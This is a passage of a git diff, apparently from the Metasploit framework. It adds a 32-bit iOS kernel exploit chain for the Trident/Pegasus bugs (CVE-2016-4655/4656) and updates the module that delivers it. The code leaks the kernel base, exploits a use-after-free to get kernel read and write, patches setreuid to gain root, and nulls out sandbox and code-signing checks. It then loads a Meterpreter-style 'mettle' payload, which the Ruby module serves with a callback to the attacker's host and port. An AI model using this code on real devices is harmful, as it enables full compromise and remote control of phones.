kOSSerializeNumber | 2048); + WRITE_IN(data, 0x00000004); + WRITE_IN(data, 0x00000000); + + WRITE_IN(data, kOSSerializeSymbol | 30); + WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingDst" + WRITE_IN(data, 0x6f627965); + WRITE_IN(data, 0x4d647261); + WRITE_IN(data, 0x6669646f); + WRITE_IN(data, 0x4d726569); + WRITE_IN(data, 0x69707061); + WRITE_IN(data, 0x7344676e); + WRITE_IN(data, 0x00000074); + WRITE_IN(data, kOSSerializeNumber | kOSSerializeEndCollecton | 32); + WRITE_IN(data, 0x00000193); + WRITE_IN(data, 0X00000000); + + CFMutableDictionaryRef amfi = IOServiceMatching_func("AppleMobileFileIntegrity"); + io_service_t service = IOServiceGetMatchingService_func(0, amfi); + io_connect_t connection; + kern_return_t result; + + NDR_record_t* NDR_record_lookup = dlsym_func(libIOKit, "NDR_record"); + io_service_open_extended_func(service, mach_task_self_func(), 0, *NDR_record_lookup, data, bufpos, &result, &connection); + if (result != KERN_SUCCESS) { + /*asl_log_func(0, 0, ASL_LEVEL_ERR, "error!\n");*/ + } + + io_object_t object = 0; + uint32_t size = sizeof(data); + io_iterator_t iterator; + IORegistryEntryGetChildIterator_func(service, "IOService", &iterator); + + do { + if (object) { + IOObjectRelease_func(object); + } + object = IOIteratorNext_func(iterator); + } while (IORegistryEntryGetProperty_func(object, "HIDKeyboardModifierMappingSrc", data, &size)); + + uint32_t kernel_base = 0; + if (size > 8) { + kernel_base = (*(uint32_t *)(data+36) & 0xFFF00000) + 0x1000; + } + + debug_print("found kernel_base %p!\n", (void*)kernel_base); + + + // CVE-2016-4656 + pthread_t insert_payload_thread; + volatile uint32_t payload_ptr = 0x12345678; + uint32_t args[] = {kernel_base, (uint32_t)&payload_ptr}; + + mach_port_t master = 0, res; + struct stat buf; + mach_port_name_t kernel_task; + + pthread_create_func(&insert_payload_thread, NULL, &insert_payload, args); + + while (payload_ptr == 0x12345678); + sleep_func(1); + + memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); + bufpos = sizeof(kOSSerializeBinarySignature); + + bool pre91 = false; + + WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10); + if (pre91) + { + /* pre-9.1 doesn't accept strings as keys, but duplicate keys :D */ + WRITE_IN(data, kOSSerializeSymbol | 4); + WRITE_IN(data, 0x00327973); // "sy2" + /* our key is a OSString object that will be freed */ + WRITE_IN(data, kOSSerializeString | 4); + WRITE_IN(data, 0x00327973); // irrelevant + + /* now this will free the string above */ + WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" + WRITE_IN(data, kOSSerializeBoolean | 1); // lightweight value + + /* and this is the key for the value below */ + WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" again + } + else + { + /* our key is a OSString object that will be freed */ + WRITE_IN(data, kOSSerializeString | 4); + WRITE_IN(data, 0x00327973); // "sy2" + } + WRITE_IN(data, kOSSerializeData | 0x14); + WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT+PEXPLOIT_TO_UAF_PAYLOAD); // [00] address of uaf_payload_buffer + WRITE_IN(data, 0x41414141); // [04] dummy + WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT); // [08] address of uaf_payload_buffer - 8 + WRITE_IN(data, 0x00000014); // [0C] static value of 20 + WRITE_IN(data, kernel_base+find_OSSerializer_serialize()+1); // [10] address of OSSerializer::serialize (+1) + + /* now create a reference to object 1 which is the OSString object that was just freed */ + WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | (pre91 ? 2 : 1)); + + /* get a master port for IOKit API */ + host_get_io_master_func(mach_host_self_func(), &master); + + /* trigger the bug */ + kr = io_service_get_matching_services_bin_func(master, data, bufpos, &res); + + /* test read primitive */ + uint32_t kernel_header = read_primitive(kernel_base); + debug_print("kernel_header = %p!\n", (void*)kernel_header); + + vm_kernel_addrperm = read_primitive(kernel_base+find_vm_kernel_addrperm()); + + /* pipe test */ + fstat_func(fildes[0], &buf); + cpipe = (uint32_t)(buf.st_ino - vm_kernel_addrperm); + + write_func(fildes[1], "ABCDEFGH", 8); + read_primitive(cpipe); + pipebuf = read_primitive(cpipe+16); + if (read_primitive(pipebuf) != 0x44434241) { // "ABCD" + debug_print("read_primitive fail\n"); + return; + } + if (read_primitive(pipebuf+4) != 0x48474645) { // "EFGH" + debug_print("read_primitive fail\n"); + return; + } + + read_func(fildes[0], data, 4096); + + /* test write primitive */ + write_gadget = kernel_base + find_write_gadget(); + + write_primitive(pipebuf, 0x41424142); + if (read_primitive(pipebuf) != 0x41424142) { + debug_print("read_primitive fail\n"); + return; + } + + /* patch kernel pmap */ + patch_kernel_pmap(kernel_base); + + /* test kernel pmap patch */ + write_primitive(kernel_base, 0x41424142); + kernel_header = read_primitive(kernel_base); + debug_print("kernel_header = %p!\n", (void*)kernel_header); + write_primitive(kernel_base, 0xfeedface); + kernel_header = read_primitive(kernel_base); + debug_print("kernel_header = %p!\n", (void*)kernel_header); + + kr = task_for_pid_func(mach_task_self_func(), 0, &kernel_task); + /*assert(kr != 0);*/ + patch_task_for_pid(kernel_base); + sleep_func(1); + kr = task_for_pid_func(mach_task_self_func(), 0, &kernel_task); + /*assert(kr == 0);*/ + + /* test kernel task port */ + /*kr = vm_read_func(kernel_task, kernel_base, 4, &b, &size);*/ + /*assert(kr == 0);*/ + /*assert(*(uint32_t*)(b) == 0xfeedface);*/ + + /* patch setreuid */ + debug_print("getuid() = %d!\n", getuid_func()); + /*assert(getuid() != 0);*/ + uint32_t setreuid_base = find_setreuid() + kernel_base; + uint32_t branch_addr = 0x3e + setreuid_base; + ushort new_branch = find_setreuid_cred_update(); // b loc_802aaa2c + vm_write_func(kernel_task, branch_addr, (vm_address_t)&new_branch, 2); + + sleep_func(1); + + /*assert(setreuid(0, 0) == 0);*/ + setreuid_func(0, 0); + + /* got root? */ + debug_print("getuid() = %d!\n", getuid_func()); + /*assert(getuid() == 0);*/ + + uint32_t kernel_start = 0xffffffff; + uint32_t kernel_end = 0; + + char* kbase = malloc_func(0x1000); + vm_size_t memsize; + vm_read_overwrite_func(kernel_task, kernel_base, 0x1000, kbase, &memsize); + mach_header_t *mh=(struct mach_header *)kbase; + debug_print("ncmds = %d!\n", mh->ncmds); + struct load_command *lc=(struct load_command *)(mh+1); + for (int i=0;incmds; i++) { + if (lc->cmd == LC_SEGMENT_T) { + struct segment_command *sc = (struct segment_command*)lc; + debug_print("found segment %s!\n", sc->segname); + if (sc->vmaddr < kernel_start) { + kernel_start = sc->vmaddr; + } + if (sc->vmaddr+sc->vmsize > kernel_end) { + kernel_end = sc->vmaddr+sc->vmsize; + } + } + lc=(struct load_command*)(((char *)lc)+lc->cmdsize); + } + + size_t kernel_size = (kernel_end - kernel_start); + debug_print("kernel start %p, end %p, size %p!\n", (void*)kernel_start, (void*)kernel_end, (void*)(kernel_size)); + free_func(kbase); + + vm_address_t kdata = (vm_address_t)malloc_func(kernel_size); + for (int i=0; (i<<12): Sandbox: com.apple.WebKit(180) deny(1) file-read-data /private/var/root/log.dylib*/ + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_proc_check_fork), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_iokit_check_get_property), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_accept), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_accepted), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_bind), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_connect), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_create), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_label_update), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_listen), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_receive), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_received), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_select), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_send), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_stat), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_setsockopt), 0); + write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_getsockopt), 0); + + uint8_t *amfistr = boyermoore_horspool_memmem(kdata, kernel_size, (uint8_t *)"Apple Mobile File Integrity", sizeof("Apple Mobile File Integrity") - 1); + if (!amfistr) { + debug_print("amfi fail\n"); + return; + } + uint32_t amfiwhat = (amfistr - kdata) + kernel_start; + uint32_t amfiops = 0; + for (uint32_t off = 0; off < kernel_size; off += 4) { + if (*(uint32_t*)(kdata + off) == amfiwhat) { + debug_print("amfiops found %p\n", (void*)(kdata + off)); + amfiops = *(uint32_t*)(kdata + off + 12); + break; + } + } + write_primitive(amfiops+offsetof(struct mac_policy_ops, mpo_file_check_mmap), 0); + + uint8_t *amfidriverstr = boyermoore_horspool_memmem(kdata, kernel_size, (uint8_t *)"com.apple.driver.AppleMobileFileIntegrity", sizeof("com.apple.driver.AppleMobileFileIntegrity") - 1); + /*uint32_t cs_enforce_maybe = (amfidriverstr - kdata) + kernel_start + 0xb0;*/ + /*write_primitive(cs_enforce_maybe, 1);*/ + + // TODO fix hardcoded offset + uint32_t amfi_memcmp = (amfidriverstr - kdata) + kernel_start - 0x1af58; + /* fixes amfid[193] : /private/var/root/log.dylib not valid: 0xe800801c: No code signature found.*/ + write_primitive(amfi_memcmp, 0x47702000); // mov r0, #0; bx lr + + free_func(kdata); + + // TODO app2dylib mettle, and put it here + void* libmettle = dlopen_func("/var/root/mettle.dylib", RTLD_NOW); + debug_print("mettle found %p\n", (void*)(libmettle)); + + typedef int (*main_ptr)(int argc, char *argv[]); + main_ptr main_func = dlsym_func(libmettle, "main"); + debug_print("main %p\n", main_func); + char progname[] = "libmettle"; + char *argv[] = { progname, NULL }; + int mainret = main_func(1, argv); + debug_print("main finished %d\n", mainret); + +} + + diff --git a/external/source/exploits/CVE-2016-4655/main32.c b/external/source/exploits/CVE-2016-4655/main32.c new file mode 100644 index 0000000000..b8e3eaa74b --- /dev/null +++ b/external/source/exploits/CVE-2016-4655/main32.c @@ -0,0 +1,241 @@ +#include +#include + +#include +#include +#include +#include + +#include +#include + +#include +#include + +#include + +/*#define DEBUG 1*/ + +#if __aarch64__ +typedef struct mach_header_64 mach_header_t; +typedef struct segment_command_64 segment_command_t; +typedef struct section_64 section_t; +typedef struct nlist_64 nlist_t; +#define MH_MAGIC_T MH_MAGIC_64 +#define LC_SEGMENT_T LC_SEGMENT_64 +#else +typedef struct mach_header mach_header_t; +typedef struct segment_command segment_command_t; +typedef struct section section_t; +typedef struct nlist nlist_t; +#define MH_MAGIC_T MH_MAGIC +#define LC_SEGMENT_T LC_SEGMENT +#endif + +//https://github.com/opensource-apple/dyld/blob/master/configs/dyld.xcconfig - iOS 9.3.4 +#ifdef __x86_64 +#define DYLD_BASE_ADDRESS 0x7fff5fc00000 +#elif __arm64 +#define DYLD_BASE_ADDRESS 0x120000000 +#elif __arm +#define DYLD_BASE_ADDRESS 0x1fe00000 +#else +#endif + +int string_compare(const char* s1, const char* s2); +long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6); +void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer); +uint64_t syscall_chmod(uint64_t path, long mode); +uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer); +void init_exploit(void * dlsym_addr, void * dlopen_addr); +void init_main(); +void init(); + +int main() +{ + init(); +} + +void init() +{ + void* dlopen_addr = 0; + void* dlsym_addr = 0; + + uint64_t start = DYLD_BASE_ADDRESS; + /*if (sierra) {*/ + /*}*/ + uint64_t dyld = find_macho(start, 0x1000, 0); + + resolve_dyld_symbol(dyld, &dlopen_addr, &dlsym_addr); + + typedef void* (*dlopen_ptr)(const char *filename, int flags); + typedef void* (*dlsym_ptr)(void *handle, const char *symbol); + dlopen_ptr dlopen_func = dlopen_addr; + dlsym_ptr dlsym_func = dlsym_addr; + void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW); + + // Suspend threads + typedef mach_port_t (*mach_task_self_ptr)(); + typedef thread_port_t (*mach_thread_self_ptr)(); + typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread); + typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count); + void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW); + mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self"); + mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self"); + thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend"); + task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads"); + thread_act_t current_thread = mach_thread_self_func(); + mach_msg_type_number_t thread_count; + thread_act_array_t thread_list; + kern_return_t result = task_threads_func(mach_task_self_func(), &thread_list, &thread_count); + if (!result && thread_count) { + for (unsigned int i = 0; i < thread_count; ++i) { + thread_act_t other_thread = thread_list[i]; + if (other_thread != current_thread) { + thread_suspend_func(other_thread); + } + } + } + + // Run exploit + init_exploit(dlsym_addr, dlopen_addr); + +} + +uint64_t syscall_chmod(uint64_t path, long mode) +{ + return asm_syscall(15, path, mode, 0, 0, 0, 0); +} + +long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6){ + long ret; +#ifdef __x86_64 + asm volatile ( + "movq %1, %%rax\n\t" + "movq %2, %%rdi\n\t" + "movq %3, %%rsi\n\t" + "movq %4, %%rdx\n\t" + "movq %5, %%rcx\n\t" + "movq %6, %%r8\n\t" + "movq %7, %%r9\n\t" + "syscall" + : "=a"(ret) + : "g"(syscall_number), "g"(arg1), "g"(arg2), "g"(arg3), "g"(arg4), "g"(arg5), "g"(arg6) ); +#elif __arm__ + volatile register uint32_t r12 asm("r12") = syscall_number; + volatile register uint32_t r0 asm("r0") = arg1; + volatile register uint32_t r1 asm("r1") = arg2; + volatile register uint32_t r2 asm("r2") = arg3; + volatile register uint32_t r3 asm("r3") = arg4; + volatile register uint32_t r4 asm("r4") = arg5; + volatile register uint32_t r5 asm("r5") = arg6; + volatile register uint32_t xret asm("r0"); + asm volatile ( + "mov r0, %2\n" + "mov r1, %3\n" + "mov r2, %4\n" + "mov r3, %5\n" + "mov r4, %6\n" + "mov r5, %7\n" + "mov r12, %1\n" + "swi 0x80\n" + "mov %0, r0\n" + : "=r"(xret) + : "r"(r12), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5) + : "r0", "r1", "r2", "r3", "r4", "r5", "r12"); + ret = xret; +#elif __aarch64__ + // : ¯\_(ツ)_/¯ + volatile register uint64_t x16 asm("x16") = syscall_number; + volatile register uint64_t x0 asm("x0") = arg1; + volatile register uint64_t x1 asm("x1") = arg2; + volatile register uint64_t x2 asm("x2") = arg3; + volatile register uint64_t x3 asm("x3") = arg4; + volatile register uint64_t x4 asm("x4") = arg5; + volatile register uint64_t x5 asm("x5") = arg6; + volatile register uint64_t xret asm("x0"); + asm volatile ( + "mov x0, %2\n\t" + "mov x1, %3\n\t" + "mov x2, %4\n\t" + "mov x3, %5\n\t" + "mov x4, %6\n\t" + "mov x5, %7\n\t" + "mov x16, %1\n\t" + "svc 0x80\n\t" + "mov %0, x0\n\t" + : "=r"(xret) + : "r"(x16), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5) + : "x0", "x1", "x2", "x3", "x4", "x5", "x16"); + ret = xret; +#endif + return ret; +} + +int string_compare(const char* s1, const char* s2) +{ + while (*s1 != '\0' && *s1 == *s2) + { + s1++; + s2++; + } + return (*(unsigned char *) s1) - (*(unsigned char *) s2); +} + +uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer) +{ + while(1) { + uint64_t ptr = addr; + if (pointer) { + ptr = *(uint64_t *)ptr; + } + unsigned long ret = syscall_chmod(ptr, 0777); + if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_T) { + return ptr; + } + + addr += increment; + } + return 0; +} + +// Credits: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html +void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer) +{ + struct load_command* lc; + segment_command_t* sc; + segment_command_t* data; + section_t* data_const = 0; + lc = (struct load_command*)(base + sizeof(mach_header_t)); + + for (int i=0;i<((mach_header_t*)base)->ncmds; i++) { + if (lc->cmd == LC_SEGMENT_T) { + sc = (struct segment_command*)lc; + if (string_compare(sc->segname, "__DATA") == 0) { + data = (struct segment_command*)lc; + break; + } + } + lc = (struct load_command *)((unsigned long)lc + lc->cmdsize); + } + data_const = data + 1; + for (int i=0; insects; i++,data_const++) { + if (string_compare(data_const->sectname, "__const") == 0) { + break; + } + } + void **dataConst = base + data_const->offset; + + while (!*dlopen_pointer || !*dlsym_pointer) { + if (string_compare((char*)(dataConst[0]), "__dyld_dlopen") == 0) { + *dlopen_pointer = (void*)dataConst[1]; + } + if (string_compare((char*)(dataConst[0]), "__dyld_dlsym") == 0) { + *dlsym_pointer = (void*)dataConst[1]; + } + dataConst += 2; + } +} + +#include "exploit32.c" + diff --git a/external/source/exploits/CVE-2016-4655/ssh_build.sh b/external/source/exploits/CVE-2016-4655/ssh_build.sh deleted file mode 100755 index e2525f28a5..0000000000 --- a/external/source/exploits/CVE-2016-4655/ssh_build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash - -make clean -rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/ -ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!" -rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ . -ls -l main_vm -cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit - - diff --git a/modules/exploits/apple_ios/browser/webkit_trident.rb b/modules/exploits/apple_ios/browser/webkit_trident.rb index 4b1b066989..f5a2c1477c 100644 --- a/modules/exploits/apple_ios/browser/webkit_trident.rb +++ b/modules/exploits/apple_ios/browser/webkit_trident.rb @@ -34,6 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/Siguza/PhoenixNonce'], ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], + ['URL', 'https://github.com/benjamin-42/Trident'], + ['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'], ], 'Arch' => ARCH_AARCH64, 'Platform' => 'apple_ios', @@ -50,13 +52,19 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_uri(cli, request) print_status("Request from #{request['User-Agent']}") - if request.uri =~ %r{/loader$} - print_good("Target is vulnerable.") + if request.uri =~ %r{/loader32$} + print_good("armle target is vulnerable.") + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit32" ) + loader_data = File.read(local_file, {:mode => 'rb'}) + send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) + return + elsif request.uri =~ %r{/loader64$} + print_good("aarch64 target is vulnerable.") local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" ) loader_data = File.read(local_file, {:mode => 'rb'}) send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) return - elsif request.uri =~ %r{/exploit$} + elsif request.uri =~ %r{/exploit64$} local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" ) loader_data = File.read(local_file, {:mode => 'rb'}) payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}" @@ -70,228 +78,272 @@ class MetasploitModule < Msf::Exploit::Remote